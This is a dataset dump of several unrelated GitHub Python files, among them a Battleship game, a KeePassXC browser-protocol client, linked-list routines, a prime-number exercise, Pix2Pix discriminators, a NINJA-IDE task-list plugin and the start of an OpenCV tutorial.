'.'\nHORIZONTAL = 'h'\nVERTICAL = 'v'\nMAX_MISSES = 20\nSHIP_SIZES = {\n    \"carrier\": 5,\n    \"battleship\": 4,\n    \"cruiser\": 3,\n    \"submarine\": 3,\n    \"destroyer\": 2\n}\nNUM_ROWS = 10\nNUM_COLS = 10\nROW_IDX = 0\nCOL_IDX = 1\nMIN_ROW_LABEL = 'A'\nMAX_ROW_LABEL = 'J'\n\n\ndef get_random_position():\n    \"\"\"Generates a random location on a board of NUM_ROWS x NUM_COLS.\"\"\"\n\n    row_choice = chr(\n        random.choice(\n            range(\n                ord(MIN_ROW_LABEL),\n                ord(MIN_ROW_LABEL) + NUM_ROWS\n            )\n        )\n    )\n\n    col_choice = random.randint(0, NUM_COLS - 1)\n\n    return (row_choice, col_choice)\n\n\ndef play_battleship():\n    \"\"\"Controls flow of Battleship games including display of\n    welcome and goodbye messages.\n\n    :return: None\n    \"\"\"\n\n    print(\"Let's Play Battleship!\\n\")\n\n    game_over = False\n\n    while not game_over:\n\n        game = Game()\n        game.display_board()\n\n        while not game.is_complete():\n            pos = game.get_guess()\n            result = game.check_guess(pos)\n            game.update_game(result, pos)\n            game.display_board()\n\n        game_over = end_program()\n\n    print(\"Goodbye.\")\n\n### DO NOT EDIT ABOVE (with the exception of MAX_MISSES) ###\n\n\n
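# e.g. Ship(\"destroyer\", (\"C\", 4), \"h\") occupies board positions (\"C\", 4) and (\"C\", 5),\n# since SHIP_SIZES[\"destroyer\"] is 2 and the orientation is horizontal.\n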
class Ship:\n\n    def __init__(self, name, start_position, orientation):\n        \"\"\"Creates a new ship with the given name, placed at start_position in the\n        provided orientation. The number of positions occupied by the ship is determined\n        by looking up the name in the SHIP_SIZES dictionary.\n        :param name: the name of the ship\n        :param start_position: tuple representing the starting position of ship on the board\n        :param orientation: the orientation of the ship ('v' - vertical, 'h' - horizontal)\n        :return: None\n        \"\"\"\n        self.name = name\n        self.positions = {}\n        self.orientation = orientation\n        self.sunk = False\n\n        if self.orientation == VERTICAL:\n            for position in range(SHIP_SIZES[self.name]):\n                self.positions[(chr(ord(start_position[0]) + position)), start_position[1]] = False\n        else:\n            for position in range(SHIP_SIZES[self.name]):\n                self.positions[(start_position[0], start_position[1] + position)] = False\n\n\n\nclass Game:\n\n    def __init__(self, max_misses = MAX_MISSES):\n        \"\"\" Creates a new game with max_misses possible missed guesses.\n        The board is initialized in this function and ships are randomly\n        placed on the board.\n        :param max_misses: maximum number of misses allowed before game ends\n        \"\"\"\n        self.max_misses = max_misses\n        self.ships = []\n        self.guesses = []\n        self.board = {}\n        self.initialize_board()\n        self.create_and_place_ships()\n\n    def initialize_board(self):\n        \"\"\"Sets the board to its initial state with each position occupied by\n        a period ('.') string.\n        :return: None\n        \"\"\"\n\n        for position in range(NUM_ROWS):\n            self.board[(chr(ord(MIN_ROW_LABEL) + position))] = [BLANK_CHAR] * NUM_COLS\n\n    def in_bounds(self, start_position, ship_size, orientation):\n        \"\"\"Checks that a ship requiring ship_size positions can be placed at start position.\n        :param start_position: tuple representing the starting position of ship on the board\n        :param ship_size: number of positions needed to place ship\n        :param orientation: the orientation of the ship ('v' - vertical, 'h' - horizontal)\n        :return status: True if ship placement inside board boundary, False otherwise\n        \"\"\"\n        if orientation == VERTICAL:\n            for position in range(ship_size):\n                if chr(ord(start_position[0]) + position) not in self.board:\n                    #if (chr(ord(start_position[0]) + position) > MAX_ROW_LABEL) or (ord(start_position[0]) + position) < ord(MIN_ROW_LABEL):\n                    return False\n            return True\n        else:\n            for position in range(ship_size):\n                if start_position[1] + position >= NUM_COLS:\n                    return False\n            return True\n\n    def overlaps_ship(self, start_position, ship_size, orientation):\n        \"\"\"Checks for overlap between previously placed ships and a potential new ship\n        placement requiring ship_size positions beginning at start_position in the\n        given orientation.\n        :param start_position: tuple representing the starting position of ship on the board\n        :param ship_size: number of positions needed to place ship\n        :param orientation: the orientation of the ship ('v' - vertical, 'h' - horizontal)\n        :return status: True if ship placement overlaps previously placed ship, False otherwise\n        \"\"\"\n\n        if orientation == VERTICAL:\n            for position in range(ship_size):\n                new_position = (chr(ord(start_position[0]) + position), start_position[1])\n                for j in range(len(self.ships)):\n                    if new_position in self.ships[j].positions:\n                        return True\n            return False\n        else:\n            for position in range(ship_size):\n                new_position = (start_position[0], start_position[1] + position)\n                for j in range(len(self.ships)):\n                    if new_position in self.ships[j].positions:\n                        return True\n            return False\n\n
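    # e.g. with the 10x10 board, a 5-cell carrier at ('A', 7) fails in_bounds\n    # horizontally (it would need columns 7..11) but fits vertically (rows A..E),\n    # so place_ship() below returns 'v' when nothing overlaps there.\n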
    def place_ship(self, start_position, ship_size):\n        \"\"\"Determines if placement is possible for ship requiring ship_size positions placed at\n        start_position. Returns the orientation where placement is possible or None if no placement\n        in either orientation is possible.\n        :param start_position: tuple representing the starting position of ship on the board\n        :param ship_size: number of positions needed to place ship\n        :return orientation: 'h' if horizontal placement possible, 'v' if vertical placement possible,\n        None if no placement possible\n        \"\"\"\n\n        if self.in_bounds(start_position, ship_size, HORIZONTAL) is True and self.overlaps_ship(start_position, ship_size, HORIZONTAL) is False:\n            return HORIZONTAL\n        elif self.in_bounds(start_position, ship_size, VERTICAL) is True and self.overlaps_ship(start_position, ship_size, VERTICAL) is False:\n            return VERTICAL\n        else:\n            return None\n\n    def create_and_place_ships(self):\n        \"\"\"Instantiates ship objects with valid board placements.\n        :return: None\n        \"\"\"\n\n        for ship in self._ship_types:\n            random_pos = get_random_position()\n            placement = self.place_ship(random_pos, SHIP_SIZES[ship])\n            while placement is None:\n                random_pos = get_random_position()\n                placement = self.place_ship(random_pos, SHIP_SIZES[ship])\n\n            ship = Ship(ship, random_pos, placement)\n            self.ships.append(ship)\n\n    def get_guess(self):\n        \"\"\"Prompts the user for a row and column to attack. The\n        return value is a board position in (row, column) format\n        :return position: a board position as a (row, column) tuple\n        \"\"\"\n\n        running = True\n        row = input(\"Enter a row: \")\n        while running is True:\n            if ord(row) in range(ord('A'), ord('K')):\n                col = int(input(\"Enter a column: \"))\n                if col in range(NUM_COLS):\n                    running = False\n                    return row, col\n            else:\n                row = input(\"Enter a row: \")\n\n    def check_guess(self, position):\n        \"\"\"Checks whether or not position is occupied by a ship. A hit is\n        registered when position occupied by a ship and position not hit\n        previously. A miss occurs otherwise.\n        :param position: a (row,column) tuple guessed by user\n        :return: guess_status: True when guess results in hit, False when guess results in miss\n        \"\"\"\n\n        for ship in self.ships:\n            if position in ship.positions and ship.positions.get(position) is False:\n                ship.positions[position] = True\n                # a ship is sunk once every one of its positions has been hit\n                if all(ship.positions.values()):\n                    ship.sunk = True\n                    print(\"You sunk the \" + ship.name + '!')\n                return True\n        return False\n\n    def update_game(self, guess_status, position):\n        \"\"\"Updates the game by modifying the board with a hit or miss\n        symbol based on guess_status of position.\n        :param guess_status: True when position is a hit, False otherwise\n        :param position: a (row,column) tuple guessed by user\n        :return: None\n        \"\"\"\n\n        if self.board[position[ROW_IDX]][position[COL_IDX]] == BLANK_CHAR:\n            if guess_status is False:\n                self.board[position[ROW_IDX]][position[COL_IDX]] = MISS_CHAR\n            else:\n                self.board[position[ROW_IDX]][position[COL_IDX]] = HIT_CHAR\n        if guess_status is False:\n            self.guesses.append(position)\n\n    def is_complete(self):\n        \"\"\"Checks to see if a Battleship game has ended. Returns True when the game is complete\n        with a message indicating whether the game ended due to successfully sinking all ships\n        or reaching the maximum number of guesses. 
Returns False when the game is not\n complete.\n :return: True on game completion, False otherwise\n \"\"\"\n\n sunk_ship = 0\n for ship in self.ships:\n if ship.sunk is True:\n sunk_ship += 1\n\n if sunk_ship == len(self.ships):\n print(\"YOU WIN!\")\n return True\n elif len(self.guesses) == MAX_MISSES:\n print(\"SORRY! NO GUESSES LEFT.\")\n return True\n else:\n return False\n\n\n\n ########## DO NOT EDIT #########\n \n _ship_types = [\"carrier\", \"battleship\", \"cruiser\", \"submarine\", \"destroyer\"]\n \n \n def display_board(self):\n \"\"\" Displays the current state of the board.\"\"\"\n\n print()\n print(\" \" + ' '.join('{}'.format(i) for i in range(len(self.board))))\n for row_label in self.board.keys():\n print('{} '.format(row_label) + ' '.join(self.board[row_label]))\n print()\n\n ########## DO NOT EDIT #########\n\n\ndef end_program():\n \"\"\"Prompts the user with \"Play again (Y/N)?\" The question is repeated\n until the user enters a valid response (Y/y/N/n). The function returns\n False if the user enters 'Y' or 'y' and returns True if the user enters\n 'N' or 'n'.\n\n :return response: boolean indicating whether to end the program\n \"\"\"\n\n answers = ('Y', 'y', 'N', 'n')\n user = ''\n while user not in answers:\n user = input(\"Play again (Y/N)? \")\n print()\n\n if user == 'N' or user == 'n':\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"Executes one or more games of Battleship.\"\"\"\n\n play_battleship()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jenna-03/Python-Projects","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2934427467","text":"import json\nimport base64 as b64\nfrom subprocess import Popen, PIPE, STDOUT\nimport struct\nfrom typing import Dict, List\n\nimport nacl.utils\nfrom nacl import encoding\nfrom nacl.public import PrivateKey, PublicKey, Box\nfrom uuid import uuid1\n\n\n\nclass KeePassError(Exception):\n def __init__(self, error_code: int, message: str):\n self.error_code = error_code\n self.message = message\n\n\nclass Kpxcnm:\n CLIENT_ID_SIZE = 24\n NONCE_SIZE = 24\n\n def __init__(self, privkey: PrivateKey = None, db_id: str = None):\n if privkey is None:\n self.privkey = PrivateKey.generate()\n else:\n self.privkey = privkey\n self.db_id = db_id\n self.db_pubkey = None\n self.kp_box = None\n self.client_id = self._to_b64_str(\n nacl.utils.random(self.CLIENT_ID_SIZE))\n self.pubkey = self.privkey\\\n .public_key.encode(encoding.Base64Encoder)\\\n .decode('UTF-8')\n self.kpxc_proxy = Popen('keepassxc-proxy', stdout=PIPE,\n stdin=PIPE, stderr=STDOUT)\n\n @staticmethod\n def _to_b64_str(bytedata: bytes) -> str:\n return b64.b64encode(bytedata).decode('UTF-8')\n\n @staticmethod\n def _from_b64_str(string: str) -> bytes:\n return b64.b64decode(string.encode('UTF-8'))\n\n def _gen_nonce(self) -> str:\n return self._to_b64_str(nacl.utils.random(self.NONCE_SIZE))\n\n def _send_message(self, message) -> None:\n message = json.dumps(message).encode('UTF-8')\n self.kpxc_proxy.stdin.write(struct.pack('I', len(message)))\n self.kpxc_proxy.stdin.write(message)\n self.kpxc_proxy.stdin.flush()\n\n def _read_message(self) -> Dict[str, str]:\n txt_len_b = self.kpxc_proxy.stdout.read(4)\n if txt_len_b == 0:\n return None\n txt_len = struct.unpack('i', txt_len_b)[0]\n return json.loads(\n self.kpxc_proxy.stdout.read(txt_len).decode('UTF-8'))\n\n def _decrypt_message(self, 
message: Dict[str, str]) -> Dict[str, str]:\n return json.loads(self.kp_box.decrypt(\n self._from_b64_str(message['message']),\n self._from_b64_str(message['nonce'])).decode('UTF-8'))\n\n def _send_encrypted_message(self, message: Dict[str, str],\n trigger_unlock: bool) -> None:\n nonce = nacl.utils.random(self.NONCE_SIZE)\n self._send_message({\n 'action': message['action'],\n 'message': self._to_b64_str(self.kp_box.encrypt(\n json.dumps(message).encode('UTF-8'), nonce).ciphertext),\n 'nonce': self._to_b64_str(nonce),\n 'clientID': self.client_id,\n 'triggerUnlock': 'true' if trigger_unlock else 'false'\n })\n\n def read_message(self) -> Dict[str, str]:\n message = self._read_message()\n if 'error' in message:\n raise KeePassError(int(message['errorCode']), message['error'])\n if 'message' in message:\n message = self._decrypt_message(message)\n return message\n\n def change_public_keys(self) -> bool:\n self._send_message({\n 'action': 'change-public-keys',\n 'publicKey': self.pubkey,\n 'nonce': self._gen_nonce(),\n 'clientID': self.client_id\n })\n response = self.read_message()\n is_success = response['success'] == 'true'\n if is_success:\n self.db_pubkey = PublicKey(\n response['publicKey'].encode('UTF-8'),\n encoding.Base64Encoder)\n self.kp_box = Box(self.privkey, self.db_pubkey)\n return is_success\n return False\n\n def get_databasehash(self, trigger_unlock: bool = False) -> str:\n self._send_encrypted_message({\n 'action': 'get-databasehash'\n }, trigger_unlock)\n response = self.read_message()\n if response['success'] == 'true':\n return response['hash']\n\n def associate(self, id_key: str = \"\",\n trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'associate',\n 'key': self.pubkey,\n 'idKey': id_key\n }, trigger_unlock)\n response = self.read_message()\n is_success = response['success'] == 'true'\n if is_success:\n self.db_id = response['id']\n return is_success\n\n def test_associate(self, trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'test-associate',\n 'id': self.db_id,\n 'key': self.pubkey\n }, trigger_unlock)\n response = self.read_message()\n return response['success'] == 'true'\n\n def generate_password(self) -> str:\n self._send_message({\n 'action': 'generate-password',\n 'nonce': self._gen_nonce(),\n 'clientID': self.client_id\n })\n response = self.read_message()\n if response['success'] == 'true':\n return response['entries'][0]['password']\n\n def get_logins(self, url: str,\n submit_url: str = None,\n http_auth: bool = False,\n trigger_unlock: bool = False) -> List[Dict[str, str]]:\n self._send_encrypted_message({\n 'action': 'get-logins',\n 'url': url,\n 'submitUrl': url if submit_url is None else submit_url,\n 'httpAuth': 'true' if http_auth else 'false',\n 'keys': [\n {\n 'id': self.db_id,\n 'key': self.pubkey\n }\n ]\n }, trigger_unlock)\n response = self.read_message()\n if response['success'] == 'true':\n return response['entries']\n\n def set_login(self, username: str, password: str,\n url: str, group: str, group_uuid: str,\n uuid: str = None, trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'set-login',\n 'url': url,\n 'submitUrl': url,\n 'id': self.db_id,\n 'nonce': self._gen_nonce(),\n 'login': username,\n 'password': password,\n 'group': group,\n 'groupUuid': group_uuid,\n 'uuid': uuid1().hex if uuid is None else uuid\n }, trigger_unlock)\n response = self.read_message()\n return response['success'] == 'true'\n\n def get_database_groups(self, 
trigger_unlock: bool = False) -> Dict[str, any]:\n        self._send_encrypted_message({\n            'action': 'get-database-groups'\n        }, trigger_unlock)\n        return self.read_message()\n\n    def create_new_group(self, group_name: str, trigger_unlock: bool = False) -> str:\n        self._send_encrypted_message({\n            'action': 'create-new-group',\n            'groupName': group_name\n        }, trigger_unlock)\n        return self.read_message()['uuid']\n\n    def lock_database(self, trigger_unlock: bool = False) -> bool:\n        self._send_encrypted_message({\n            'action': 'lock-database'\n        }, trigger_unlock)\n        self.read_message()\n        return True\n\n","repo_name":"Ashymad/kpxcnm","sub_path":"kpxcnm.py","file_name":"kpxcnm.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10117695967","text":"'''\r\n\tImplement the following common linked-list routines:\r\n\t1. Reverse a singly linked list: recursive and non-recursive\r\n\t2. Detect a cycle in a linked list\r\n\t3. Merge two sorted linked lists\r\n\t4. Remove the n-th node from the end of a linked list\r\n\t5. Find the middle node of a linked list\r\n'''\r\n\r\nclass Linklist(object):\r\n\tdef __init__(self,val = -1):\r\n\t\tself.val = val\r\n\t\tself.next = None\r\n\r\n\r\ndef reversed_link(l : Linklist) -> Linklist:\r\n\t'''\r\n\t\tReverse a singly linked list\r\n\t'''\r\n\tif l.next == None or l.next.next == None:\r\n\t\treturn l.next\r\n\treversed_head = Linklist()\r\n\twhile l.next != None:\r\n\t\t# take nodes from the front of the original list and head-insert them into the new list\r\n\t\ttemp = l.next\r\n\t\tl.next = l.next.next\r\n\t\ttemp.next = reversed_head.next\r\n\t\treversed_head.next = temp\r\n\treturn reversed_head\r\n\r\ndef reversed_link_iteration(l : Linklist) -> Linklist:\r\n\t\"\"\"\r\n\t\tReverse a singly linked list: iterative\r\n\t\"\"\"\r\n\tpre,cur = None,l\r\n\twhile cur:\r\n\t\tcur.next,pre,cur = pre,cur,cur.next\r\n\treturn pre\r\n\r\ndef reversed_link_recursion(l : Linklist) -> Linklist:\r\n\t\"\"\"\r\n\t\tReverse a singly linked list: recursive\r\n\t\"\"\"\r\n\tif l is None or l.next is None:\r\n\t\treturn l\r\n\telse:\r\n\t\tnewhead = reversed_link_recursion(l.next)\r\n\t\tl.next.next = l\r\n\t\tl.next = None\r\n\t\treturn newhead\r\n\r\ndef check_loop(l : Linklist) -> bool:\r\n\t'''\r\n\t\tDetermine whether a linked list contains a cycle\r\n\t'''\r\n\tslow = fast = l\r\n\t# advance the slow and fast pointers and check whether they meet\r\n\twhile fast and fast.next:\r\n\t\t# if the fast pointer can reach a null value, there is definitely no cycle\r\n\t\tslow = slow.next\r\n\t\tfast = fast.next.next\r\n\t\tif slow == fast:\r\n\t\t\treturn True\r\n\treturn False\r\n\r\ndef find_middle_node(l : Linklist) -> Linklist:\r\n\t'''\r\n\t\tReturn the middle node of the list; if the number of nodes is even, return the node just after the middle\r\n\t'''\r\n\tslow, fast = l.next, l.next\r\n\tfast = fast.next if fast else None\r\n\twhile fast and fast.next:\r\n\t\tslow, fast = slow.next, fast.next.next\r\n\treturn slow\r\n\r\n\r\ndef print_list(l : Linklist):\r\n\t'''\r\n\t\tPrint the list\r\n\t'''\r\n\tif l.next == None:\r\n\t\treturn None\r\n\telif l.next.next == None:\r\n\t\tprint(l.next.val)\r\n\t\treturn None\r\n\tresult = []\r\n\tcur = l.next\r\n\twhile cur != None:\r\n\t\tresult.append(cur.val)\r\n\t\tcur = cur.next\r\n\tprint('->'.join([str(x) for x in result]))\r\n\r\ndef merge_sortedList(l1: Linklist,l2: Linklist) -> Linklist:\r\n\t'''\r\n\t\tMerge two sorted singly linked lists\r\n\t'''\r\n\tif l1.next and l2.next:\r\n\t\tl3 = Linklist()\r\n\t\tcur = l3\r\n\t\tl1, l2 = l1.next, l2.next\r\n\t\twhile l1 and l2:\r\n\t\t\tif l1.val <= l2.val:\r\n\t\t\t\tcur.next = l1\r\n\t\t\t\tl1 = l1.next\r\n\t\t\telse:\r\n\t\t\t\tcur.next = l2\r\n\t\t\t\tl2 = l2.next\r\n\t\t\tcur = cur.next\r\n\t\tcur.next = l1 if l1 else l2\r\n\t\treturn l3\r\n\telse:\r\n\t\treturn l1 or l2 # return whichever of l1 and l2 is non-empty\r\n\r\n
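# e.g. removing the 2nd node from the end of 1->2->3->4 leaves 1->2->4\r\n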
def remove_nth_from_end(l: Linklist,n : int) -> Linklist:\r\n\t'''\r\n\t\tThe list has a dummy head node.\r\n\t\tAssumes n is a positive integer.\r\n\t\tRemove the n-th node from the end of the list.\r\n\t'''\r\n\tdummyhead = l\r\n\tfast,slow = l,l\r\n\tcount = -1\r\n\twhile fast and count < n:\r\n\t\tfast = fast.next\r\n\t\tcount += 1\r\n\tif not fast and count < n:\r\n\t\tprint('not so many nodes')\r\n\t\treturn dummyhead\r\n\tif not fast and count == 0:\r\n\t\tdummyhead.next = dummyhead.next.next\r\n\t\treturn dummyhead\r\n\twhile fast:\r\n\t\tslow,fast = slow.next,fast.next\r\n\tslow.next = slow.next.next\r\n\treturn dummyhead\r\n\r\n\r\ndef main():\r\n\tl1,l2 = Linklist(),Linklist()\r\n\tcur = l1\r\n\tfor i in range(0,10,2):\r\n\t\tcur.next = Linklist(i)\r\n\t\tcur = cur.next\r\n\tcur = l2\r\n\tfor i in range(1,9,2):\r\n\t\tcur.next = Linklist(i)\r\n\t\tcur = cur.next\r\n\tprint_list(l1)\r\n\tprint_list(l2)\r\n\tl3 = merge_sortedList(l1,l2)\r\n\tprint_list(l3)\r\n\t# print('-----remove 3rd from the end----')\r\n\t# print_list(remove_nth_from_end(l3,3))\r\n\tprint('---reversed the link iterable---')\r\n\tl3 = reversed_link_iteration(l3)\r\n\tprint_list(l3)\r\n\tprint('---reversed the link---')\r\n\tl3 = reversed_link_recursion(l3)\r\n\tprint_list(l3)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"lofues/Data-Algorithm_python","sub_path":"1.LinkList/normal_algorithm_linklist.py","file_name":"normal_algorithm_linklist.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32438412129","text":"# 3. Write a program that asks the user whether to check if a number is prime with for or with while; \n# there will therefore be two functions that perform that same calculation one way (with for and without breaks)\n# or the other (with while). Both functions return true (if prime) or false (if not prime). \n# The main program reports the result. As an improvement, you can measure how long each approach \n# takes to find the answer. Note: reuse the code you have already written\n\n\nimport time\n\nbucle = input(\"¿Quieres calcular si un número es primo con for o con while? 
\")\n\ndef primos(bucle):\n num = int(input(\"Introduce un número: \"))\n def primo_for(num):\n primo = True\n for i in range(2, num):\n if num % i == 0:\n primo = False\n if primo:\n print(f\"El numero {num} es primo\")\n else:\n print(f\"El numero {num} no es primo\")\n def primo_while(num):\n primo = True\n i = 2\n while i < num:\n if num % i == 0:\n primo = False\n # Añadiendo 1 a i, se evita que se repita el bucle\n i = i + 1 \n if primo:\n print(f\"El numero {num} es primo\")\n else:\n print(f\"El numero {num} no es primo\")\n if bucle == \"for\" or bucle == \"For\":\n espera = time.time()\n primo_for(num)\n espera = time.time() - espera\n print(f\"El tiempo de espera es de {espera} segundos\")\n elif bucle == \"while\" or bucle == \"While\":\n espera = time.time()\n primo_while(num)\n espera = time.time() - espera\n print(f\"El tiempo de espera es de {espera} segundos\")\n else:\n print(\"No has introducido un valor correcto\")\nprimos(bucle)\n\n","repo_name":"Jouad01/PracticasPython","sub_path":"Practicas/Practica6/6B/ej3.py","file_name":"ej3.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35345995283","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPix2Pix Discriminator network definitions.\n\"\"\"\n\nimport torch.nn as nn\n\n\nclass NLayerDNet(nn.Module):\n \"\"\" PatchGAN discriminator network \n Classifies if an NxN patch of an image is real or fake\n \"\"\"\n \n def __init__(self, cfg, inp_nc, norm_layer=nn.BatchNorm2d, use_bias=False):\n \n super(NLayerDNet, self).__init__()\n \n ndf = cfg.ndf \n ks = 4 #4x4 filter\n pw = 1 #pad width\n activation = nn.LeakyReLU(0.2, True)\n layers = [nn.Conv2d(inp_nc, ndf, kernel_size=ks, stride=2, padding=pw), activation]\n \n #discriminator layers \n #inp channel(3)->64->128->256->512 (3 layers for 70x70 PatchGAN)\n #inp channel(3)->64->128 (1 layer for 16x16 PatchGAN)\n #inp channel(3)->64->128->256->512->512->512 (5 layers for 286x286 PatchGAN)\n mult_prev = 1\n for i in range(1, cfg.nlayers_d): #3 for default PatchGAN\n mult = min(2**i, 8) \n layers += [nn.Conv2d(ndf*mult_prev, ndf*mult, kernel_size=ks, stride=2, padding=pw, bias=use_bias), \n norm_layer(ndf*mult), \n activation]\n mult_prev = mult\n \n #add additional layers for a n-layer PatchGAN\n mult_prev = mult \n mult = min(2**cfg.nlayers_d, 8) \n layers += [nn.Conv2d(ndf*mult_prev, ndf*mult, kernel_size=ks, stride=1, padding=pw, bias=use_bias), \n norm_layer(ndf*mult), \n activation]\n \n #final layer results in a 1-dim output\n layers += [nn.Conv2d(ndf*mult, 1, kernel_size=ks, stride=1, padding=pw)]\n #stack the layers of a PatchGAN\n self.model = nn.Sequential(*layers)\n \n def forward(self, inp):\n \n out = self.model(inp)\n #print(\"PatchGan out:\", inp.shape, out.shape)\n return out\n \nclass PixelDNet(nn.Module):\n \"\"\" PixelGAN discriminator network (==1x1 PatchGAN)\n Classifies if each pixel of an image is real or fake\n \"\"\"\n \n def __init__(self, cfg, inp_nc, norm_layer=nn.BatchNorm2d, use_bias=False):\n \n super(PixelDNet, self).__init__()\n \n \n ndf = cfg.ndf \n ks = 1 #1x1 spatial filter to convolve over pixels\n pw = 0 #pad width\n activation = nn.LeakyReLU(0.2, True)\n layers = [nn.Conv2d(inp_nc, ndf, kernel_size=ks, stride=1, padding=pw), activation]\n layers += [nn.Conv2d(ndf, ndf*2, kernel_size=ks, stride=1, padding=pw, bias=use_bias), \n norm_layer(ndf*2), \n activation]\n #final layer results in a 1-dim output\n layers += 
[nn.Conv2d(ndf*2, 1, kernel_size=ks, stride=1, padding=pw, bias=use_bias)]\n #stack the layers of a PixelGAN\n self.model = nn.Sequential(*layers)\n \n def forward(self, inp):\n \n out = self.model(inp)\n #print(\"PixelGan out\", inp.shape, out.shape)\n return out \n \n \ndef createDNet(cfg, norm_layer, use_bias):\n \"\"\" Create discriminator network \n \n 3 types of discriminator architecture are supported:\n patch (\"PatchGAN\"): divides an image into subpatches of a certain size (default 70x70). \n Each patch is classified as fake or real. Has fewer params than classifying \n the whole image.\n pixel (\"PixelGAN\"): classifies if each pixel (1x1) is fake or real.\n \"\"\"\n \n net = None\n #default PatchGAN, divides an image into subpatches of a certain size (default 70x70). \n #Each patch is classified as fake or real by DNet. The network can have the basic 3 layers \n #or multiple layers.\n #input and output channels are concatenated because the DNet processes a pair of aligned images\n #that are concatenated along the channel dim.\n if cfg.disc_net == \"basic\" or cfg.disc_net == \"nlayers\": \n net = NLayerDNet(cfg, cfg.inp_nc+cfg.out_nc, norm_layer, use_bias)\n elif cfg.disc_net == \"pixel\" : #classifies if each pixel is fake or real\n net = PixelDNet(cfg, cfg.inp_nc+cfg.out_nc, norm_layer, use_bias)\n else:\n raise NotImplementedError(\"unknown discriminator net: %s\"%cfg.disc_net) \n return net \n","repo_name":"athena913/pix2pix","sub_path":"models/dnet.py","file_name":"dnet.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6488070718","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport re\n\nfrom ninja_ide.core import plugin\nfrom PyQt4.QtCore import SIGNAL\n\nfrom PyQt4.QtGui import QIcon\nfrom PyQt4.QtGui import QAbstractItemView\nfrom PyQt4.QtGui import QHeaderView\nfrom PyQt4.QtGui import QTreeWidget\nfrom PyQt4.QtGui import QTreeWidgetItem\n\n\nclass TaskList(plugin.Plugin):\n def initialize(self):\n #get the services!\n self.main_s = self.locator.get_service('editor')\n self.explorer_s = self.locator.get_service('explorer')\n\n #explorer\n self._task_widget = TaskWidget(self.locator)\n self.explorer_s.add_tab(self._task_widget, \"Tasks\")\n\n\nclass TaskWidget(QTreeWidget):\n\n TASK_IMAGE = os.path.join(os.path.dirname(__file__), 'task.png')\n TODO_REG = re.compile(\"#(\\\\s)*TODO(\\\\s)*\\\\:(\\\\s)*.\")\n FIXME_REG = re.compile(\"#(\\\\s)*FIXME(\\\\s)*\\\\:(\\\\s)*.\")\n OPTIMIZE_REG = re.compile(\"#(\\\\s)*OPTIMIZE(\\\\s)*\\\\:(\\\\s)*.\")\n\n def __init__(self, locator):\n QTreeWidget.__init__(self)\n self.locator = locator\n self._explorer_s = self.locator.get_service('explorer')\n self._main_s = self.locator.get_service('editor')\n #on current tab changed refresh\n self._main_s.currentTabChanged.connect(self._on_tab_changed)\n #on file saved refresh\n self._main_s.fileSaved.connect(self._on_file_saved)\n\n self.header().setHidden(True)\n self.setSelectionMode(self.SingleSelection)\n self.setAnimated(True)\n self.header().setHorizontalScrollMode(QAbstractItemView.ScrollPerPixel)\n self.header().setResizeMode(0, QHeaderView.ResizeToContents)\n self.header().setStretchLastSection(False)\n\n self.connect(self, SIGNAL(\"itemClicked(QTreeWidgetItem *, int)\"),\n self._go_to_definition)\n\n def _on_tab_changed(self):\n self.refresh_tasks()\n\n def _on_file_saved(self, fileName):\n self.refresh_tasks()\n\n def refresh_tasks(self):\n editorWidget = 
self._main_s.get_editor()\n if editorWidget:\n source = self._main_s.get_text()\n self._parse_tasks(source)\n\n def _go_to_definition(self, item):\n #the root doesn't go to anywhere\n if item.parent() is not None:\n self._main_s.jump_to_line(item.lineno)\n\n def _parse_tasks(self, source_code):\n self.clear()\n #create roots\n todo_root = QTreeWidgetItem(self, ['TODO'])\n fixme_root = QTreeWidgetItem(self, ['FIXME'])\n optimize_root = QTreeWidgetItem(self, ['OPTIMIZE'])\n\n lines = source_code.split(\"\\n\")\n lineno = 0\n for line in lines:\n #apply the regular expressions\n todo_match = self.TODO_REG.search(line)\n fixme_match = self.FIXME_REG.search(line)\n optimize_match = self.OPTIMIZE_REG.search(line)\n if todo_match:\n content = line[todo_match.end() - 1:]\n item = TaskItem(todo_root, [content], lineno)\n item.setIcon(0, QIcon(self.TASK_IMAGE))\n elif fixme_match:\n content = line[fixme_match.end() - 1:]\n item = TaskItem(fixme_root, [content], lineno)\n item.setIcon(0, QIcon(self.TASK_IMAGE))\n elif optimize_match:\n content = line[optimize_match.end() - 1:]\n item = TaskItem(optimize_root, [content], lineno)\n item.setIcon(0, QIcon(self.TASK_IMAGE))\n\n lineno += 1\n self.expandAll()\n\n\nclass TaskItem(QTreeWidgetItem):\n\n def __init__(self, parent, content, lineno):\n QTreeWidgetItem.__init__(self, parent, content)\n self.lineno = lineno\n","repo_name":"raupulus/debian-developer-conf","sub_path":"conf/home/.ninja_ide/addins/plugins/task_list/task_list.py","file_name":"task_list.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"27"} +{"seq_id":"71807766127","text":"import cv2\r\nimport numpy as np\r\nimport sys\r\n\r\nimg = cv2.imread('assets/pic.jpg')\r\n\r\n# 1. Translation \r\n#Basically shifting an image along the X and Y axis so using translation we can shift the image up down left or right\r\ndef translate(img, x, y):\r\n #x stands for no. of pixels i want to shift along x and y stands for no. 
